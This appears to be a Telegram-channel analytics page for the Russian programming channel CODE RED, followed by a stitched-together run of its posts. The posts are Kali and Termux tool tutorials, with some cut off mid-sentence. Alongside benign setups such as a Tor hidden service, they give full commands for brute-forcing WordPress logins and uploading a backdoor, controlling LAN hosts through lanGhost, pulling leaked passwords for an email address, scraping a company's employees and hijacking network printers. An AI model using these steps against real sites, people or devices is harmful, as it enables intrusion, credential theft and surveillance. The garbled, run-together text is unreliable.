CODE RED
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки. Обратная связь: @encryptedadm
إظهار المزيد📈 نظرة تحليلية على قناة تيليجرام CODE RED
تُعد قناة CODE RED (@coderedcom) في القطاع اللغوي الروسية لاعباً نشطاً. يضم المجتمع حالياً 10 355 مشتركاً، محتلاً المرتبة 9 416 في فئة التكنولوجيات والتطبيقات والمرتبة 61 181 في منطقة روسيا.
📊 مؤشرات الجمهور والحراك
منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 10 355 مشتركاً.
بحسب آخر البيانات بتاريخ 03 ديسمبر, 2024، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 0، وفي آخر 24 ساعة بمقدار 0، مع بقاء الوصول العام مرتفعاً.
- حالة التحقق: غير موثّقة
- معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 0%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً N/A% من ردود الفعل نسبةً إلى إجمالي المشتركين.
- وصول المنشورات: يحصل كل منشور على متوسط 0 مشاهدة. وخلال اليوم الأول يجمع عادةً 0 مشاهدة.
- التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 0.
📝 الوصف وسياسة المحتوى
يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.
Обратная связь: @encryptedadm”
بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 04 ديسمبر, 2024) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.
wget https://github.com/katmagic/Shallot/archive/master.zip
◽️unzip master.zip
Переходим в созданную директорию и запускаем сборку командами
◽️cd Shallot-master
◽️./configure
◽️make
Теперь установим непосредственно Tor и lighttpd
◽️apt-get install tor
◽️apt-get install lighttpd
Настройка
На данном этапе нужно сначала получить домен. Делается это командой
◽️./shallot ^codered
Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.
Далее запускаем Tor и lighttpd
◽️service tor start
◽️service lighttpd start
В файле /etc/tor/torrc нужно будет добавить такие строки
◽️HiddenServiceDir /var/lib/tor/hidden_service/
◽️HiddenServicePort 80 127.0.0.1:8080
В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку
◽️ExcludeNodes {ru}, {ua}, {be}
Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.
Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
◽️server.document-root = "/var/www/"
◽️server.error-handler-404 = "/404.html"
◽️server.tag = "Ваше значение"
◽️server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }
◽️server.dir-listing = "disable"
Почти готово, нужно только создать вебстраницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.
#kali #TORapt-get update –y && apt-get upgrade –y && apt-get dist-upgrade
Устанавливаем Python 3
◽️apt-get install python3 python3-pip
Скачиваем репозиторий
◽️git clone https://github.com/xdavidhu/lanGhost
Переходим в директорию и запускаем установщик
◽️cd LanGhost/
◽️./setup.py
Настройка
Далее надо настроить lanGhost в 4 этапа. В первом надо просто согласиться. Во втором вписать API созданного Телеграм бота, и соответственно в третьем вписать проверочный код, который придет сразу же после второго шага. На четвертом этапе достаточно также все оставить по стандарту.
Готово! Теперь прописывая команды боту, вы сможете управлять узлами в локальной сети, к которой подключены.
#kali127.0.0.1 с портом 9050 и типом Socks 5.
Готово! Теперь абсолютно весь интернет-трафик системы проходит сквозь сеть Tor.git clone https://github.com/Moham3dRiahi/Th3inspector
Переходим в директорию с The Inspector, ставим права на установщик и запускаем его
◽️cd Th3inspector
◽️chmod +x install.sh && ./install.sh
Использование
Запускаем The Inspector командой
◽️perl Th3inspector.pl
Теперь можно выбрать интересующую функцию, вписав её номер. К примеру для получения информации о сайте вводим 1 и потом домен. Как итог получаем списком данные геолокации хостера, ip и т.д.
#kali #OSINTpkg update upgrade -y
Далее установим git
◽️pkg install git
И скачаем само решение
◽️git clone https://github.com/MrAlpha786/termux-fingerprint-lock
Настройка
Переходим в директорию с инструментами и ставим права на исполняемый файл
◽️cd termux-fingerprint-lock
◽️chmod u+x setup
Далее запускаем его
◽️bash setup
В процессе выполнения программы попросит прислонить палец к сенсору. Готово. Теперь при последующем входе в Термукс, для появления данных на экране нужно будет сначала просканировать отпечаток.
#termux #безопасностьgit clone https://github.com/thewhiteh4t/pwnedOrNot.git
Далее устанавливаем необходимый модуль Python
◽️pip install cfscrape
Готово. Для Termux установим для начала Python и Git
◽️pkg install python2
◽️pkg install git
Далее необходимые модули
◽️pip2 install requests
◽️pip2 install cfscrape
И в итоге скачаем репозиторий с github
◽️git clone https://github.com/thewhiteh4t/pwnedOrNot.git
Использование
PwnedOrNot максимально прост в использовании. Для начала процесса проверки запускаем скрипт командой
◽️python pwnedornot.py
Это как для Kali, так и для Termux. Далее остается только ввести почту и ждать завершения процесса. Если поиск пройдет удачно, в терминале появится список паролей, которые могут быть связаны со сканируемым адресом.
#kali #хакингgit clone https://github.com/0x09AL/raven.git
Переходим в директорию и запускаем установщик
cd raven
sh setup.sh
Использование
Для вывода справки нужно вписать
python raven.py
Из представленной информации можно узнать, что минимальные данные, которые нужно знать о целевой компании - это её название и инициалы страны расположения.
То есть если мы хотим узнать о сотрудниках корпорации "Evil", которая находится в России, нужно будет вписать команду
python raven.py -c 'Evil' -s ru
После завершения работы скрипта в терминале появится список всех найденных сотрудников.git clone https://github.com/n00py/WPForce.git
Также потребуется установить Python.
Использование
Запускаем атаку на сайт командой
◽python wpforce.py -i <список логинов> -w <список паролей> -u <ссылка>
В случае успеха в консоль выведется логин и пароль. Далее на сайт можно подгрузить бекдор прописав
◽python yertle.py -u <логин> -p <пароль> -t <ссылка> --interactive
Готово, тестовый веб ресурс взломан, а мы закрепились в системе и можем управлять каталогами, БД и т.д.$ pkg install -y git
$ git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig
$ chmod +x install.sh && ./install.sh
Использование
$ python3 main.py -u username
Так же, Osi.ig позволяет собрать статистику всех, и наиболее часто используемых хештегов. Дополнительно, можно проанализировать все метки местоположений, временные метки, подписи, комментарии и ссылки на изображения.
📌https://github.com/th3unkn0n/osi.ig
#OSINTpip install colorama pysnmp win_unicode_console
Далее потребуется установить несколько модулей
◽apt-get install ghostscript imagemagick
И скачать сам репозиторий с github
◽git clone https://github.com/RUB-NDS/PRET
Использование
Остается только вписать ip адрес на котором располагается целевой принтер и выбрать скриптовый язык
◽./pret.py 192.168.0.1 ps
Как итог установится сопряжение и атакующий сможет манипулировать устройством удаленно.